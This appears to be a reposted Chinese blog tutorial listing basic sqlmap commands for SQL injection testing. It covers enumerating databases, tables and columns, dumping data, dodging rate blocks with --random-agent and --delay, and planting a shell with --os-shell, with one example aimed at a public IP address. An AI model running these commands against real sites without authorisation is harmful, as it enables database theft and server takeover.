sqlmap(基础指令)

其他 2021-03-08 15:13:54 阅读次数: 0

文章目录

常用指令
1.通过-l日志文件进行sql注入探测
2.-m通过多行文本格对多个目标进行探测

常用指令

-D指定库 -T指定表 -C指定字段

1, -u 指定注入点

python sqlmap.py -u "http://127.0.0.1:8003/?id=1"

2, --dbs 跑库名

python sqlmap.py -u "http://127.0.0.1:8003/?id=1" --dbs

3, --tables 跑表名

python sqlmap.py -u "http://127.0.0.1:8003/?id=1" -D 要查询的库名 --tables

4, --columns 跑字段名

python sqlmap.py -u "http://127.0.0.1/?id=1" -D 库名 -T 表名 --columns

5, --dump 枚举数据

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 表名 -C 字段名 --dump

6

常见指令
--random-agent //选择随机请求头
--delay=1 //每次探测延时1秒（防止访问过快被ban）
--level 1-5 //测试等级
--os-shell  //尝试从网站中放入一个cmdshell

1.通过-l日志文件进行sql注入探测

导出日志文件

在这里插入图片描述访问站点留下的日志文件
把文件test复制到sqlmap目录上输入命令

python sqlmap.py -l test

2.-m通过多行文本格对多个目标进行探测

在这里插入图片描述
输入命令

python sqlmap.py -m 1.txt

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_45291045/article/details/108987986

Sqlmap基础指令

sqlmap(基础指令)

sqlmap基础

sqlmap常用指令

sqlmap基础笔记

sqlmap基础命令

SQLMap基础使用

Sqlmap注入基础命令

sqlmap基础实战

sqlmap

基础指令

SQL注入基础步骤及SQLMap工具使用

安全测试基础2-sqlmap演练

指令基础及位逻辑指令

Vue基础与基础指令

Linux指令大全之基础指令，进阶指令，高级指令

渗透测试工具sqlmap基础教程

【笔记】使用Sqlmap对目标站点进行渗透攻击【基础实验】

SQL注入基础步骤及SQLMap工具使用(二)

SQL注入基础步骤及SQLMap工具使用（一）

Linux基础指令—7

Linux基础指令—5

Linux基础指令—2

Linux基础指令—1

Linux基础指令-13

Linux基础指令-12

Linux基础指令-11

Linux基础指令-10

Linux基础指令-9

Linux基础指令—6

今日推荐

周排行

Android图片与下拉框

java常用的设计模式之单例模式

zabbix自动化监控之自动注册

杨老师课堂之Excel VBA 程序开发第八讲使用工作表函数

Android 去掉底部虚拟导航栏

Android Studio 3.2 Beta 4 发布，功能改进和修复

Linux-3.5_总线驱动设备

Qt QTableView QStandardItemModel用法

session处理

分享几个实用的方法

每日归档

更多

2025-02-06(0)

2025-02-05(0)

2025-02-04(0)

2025-02-03(0)

2025-02-02(0)

2025-02-01(0)

2025-01-31(0)

2025-01-30(0)

2025-01-29(0)

2025-01-28(0)